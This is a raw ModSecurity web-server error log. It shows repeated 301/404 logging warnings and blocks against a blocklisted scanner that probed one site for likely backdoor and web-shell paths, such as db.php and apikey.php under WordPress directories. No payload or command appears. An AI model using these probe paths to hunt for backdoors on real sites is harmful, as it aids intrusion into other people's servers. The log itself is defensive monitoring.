[Tue May 26 19:59:04.617435 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x6gAAAZU"]
[Tue May 26 19:59:04.654528 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszokAAAACM"]
[Tue May 26 19:59:04.657107 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszolAAAABs"]
[Tue May 26 19:59:04.662212 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x-gAAAd8"]
[Tue May 26 19:59:04.663108 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x_QAAAaM"]
[Tue May 26 19:59:04.664519 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x-QAAAa4"]
[Tue May 26 19:59:04.673669 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszolwAAAEc"]
[Tue May 26 19:59:04.687249 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x_AAAAdE"]
[Tue May 26 19:59:04.735384 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yAQAAAfA"]
[Tue May 26 19:59:04.744797 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yBgAAAdU"]
[Tue May 26 19:59:04.754310 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yAwAAAbs"]
[Tue May 26 19:59:04.766096 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yDAAAAf0"]
[Tue May 26 19:59:04.771429 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yCwAAAZE"]
[Tue May 26 19:59:04.779797 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25yFAAAAaw"]
[Tue May 26 19:59:04.782542 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszoogAAAGA"]
[Tue May 26 19:59:04.826604 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszopQAAAHY"]
[Tue May 26 19:59:04.837225 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszopwAAACs"]
[Tue May 26 19:59:04.846283 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszoqQAAAEM"]
[Tue May 26 19:59:05.149557 2026] [security2:error] [pid 93576:tid 93759] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuMWDRMqfxdEDkoszotgAAAC8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1229702&moderation-hash=66b6a18546aa4260a28fccc5c8e3416e
[Tue May 26 19:59:05.435839 2026] [security2:error] [pid 93576:tid 93744] [client 89.221.206.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuMWDRMqfxdEDkoszowAAAACA"], referer: https://www.anujtradingco.com/
[Tue May 26 19:59:05.554145 2026] [security2:error] [pid 93868:tid 94261] [client 45.92.1.17:49846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/hyqsbgxn.php"] [unique_id "ahWuMUqK9k_ZUB2Vp25yKwAAAZI"], referer: www.google.com
[Tue May 26 19:59:05.707084 2026] [security2:error] [pid 93868:tid 94278] [client 45.92.1.17:49845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuMUqK9k_ZUB2Vp25yNAAAAaM"], referer: www.google.com
[Tue May 26 19:59:06.015460 2026] [security2:error] [pid 93576:tid 93826] [client 45.92.1.17:50928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-plain.php"] [unique_id "ahWuMmDRMqfxdEDkoszoywAAAHI"], referer: www.google.com
[Tue May 26 19:59:06.191001 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yRwAAAZE"]
[Tue May 26 19:59:06.192818 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yRAAAAao"]
[Tue May 26 19:59:06.270966 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ySgAAAeQ"]
[Tue May 26 19:59:06.285181 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszozgAAAAs"]
[Tue May 26 19:59:06.289569 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yTwAAAcE"]
[Tue May 26 19:59:06.374782 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yVQAAAdk"]
[Tue May 26 19:59:06.392986 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yWgAAAgU"]
[Tue May 26 19:59:06.396924 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo1AAAAHY"]
[Tue May 26 19:59:06.418361 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yXAAAAfI"]
[Tue May 26 19:59:06.420640 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yXQAAAes"]
[Tue May 26 19:59:06.421926 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo4AAAABo"]
[Tue May 26 19:59:06.436954 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo3wAAAF0"]
[Tue May 26 19:59:06.454986 2026] [security2:error] [pid 93868:tid 94378] [client 45.92.1.17:51245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/uczszvto.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ydwAAAgc"], referer: www.google.com
[Tue May 26 19:59:06.455209 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo4gAAAFI"]
[Tue May 26 19:59:06.468746 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo5gAAAAM"]
[Tue May 26 19:59:06.470986 2026] [security2:error] [pid 93576:tid 93779] [client 89.221.206.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo3gAAAEM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 19:59:06.476494 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo4wAAAGM"]
[Tue May 26 19:59:06.479984 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yZgAAAfs"]
[Tue May 26 19:59:06.503821 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yawAAAcY"]
[Tue May 26 19:59:06.504835 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yagAAAeU"]
[Tue May 26 19:59:06.509160 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo7QAAAB8"]
[Tue May 26 19:59:06.511806 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ybAAAAZg"]
[Tue May 26 19:59:06.533419 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yggAAAZw"]
[Tue May 26 19:59:06.533738 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yfgAAAbw"]
[Tue May 26 19:59:06.549582 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ydAAAAa4"]
[Tue May 26 19:59:06.550191 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yeAAAAeA"]
[Tue May 26 19:59:06.561555 2026] [security2:error] [pid 93868:tid 94365] [client 45.92.1.17:49528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ykwAAAfo"]
[Tue May 26 19:59:06.562493 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ygAAAAd8"]
[Tue May 26 19:59:06.562505 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yfwAAAcw"]
[Tue May 26 19:59:06.567055 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ygwAAAfw"]
[Tue May 26 19:59:06.575506 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo9AAAAFQ"]
[Tue May 26 19:59:06.580787 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yhgAAAdU"]
[Tue May 26 19:59:06.594431 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo9gAAAFc"]
[Tue May 26 19:59:06.610486 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszo_gAAAH8"]
[Tue May 26 19:59:06.872040 2026] [security2:error] [pid 93868:tid 94364] [client 45.92.1.17:51536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yzAAAAfk"]
[Tue May 26 19:59:07.176594 2026] [security2:error] [pid 93868:tid 94371] [client 45.92.1.17:51648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuM0qK9k_ZUB2Vp25y1wAAAgA"]
[Tue May 26 19:59:07.192862 2026] [security2:error] [pid 93576:tid 93826] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpJgAAAHI"]
[Tue May 26 19:59:07.274657 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpAQAAAGI"]
[Tue May 26 19:59:07.286051 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yjgAAAZE"]
[Tue May 26 19:59:07.292789 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yjwAAAfM"]
[Tue May 26 19:59:07.295041 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ykgAAAdA"]
[Tue May 26 19:59:07.303336 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yjQAAAd4"]
[Tue May 26 19:59:07.305475 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ykQAAAgQ"]
[Tue May 26 19:59:07.316880 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ymwAAAZ4"]
[Tue May 26 19:59:07.323174 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpCQAAACk"]
[Tue May 26 19:59:07.328912 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ymAAAAcc"]
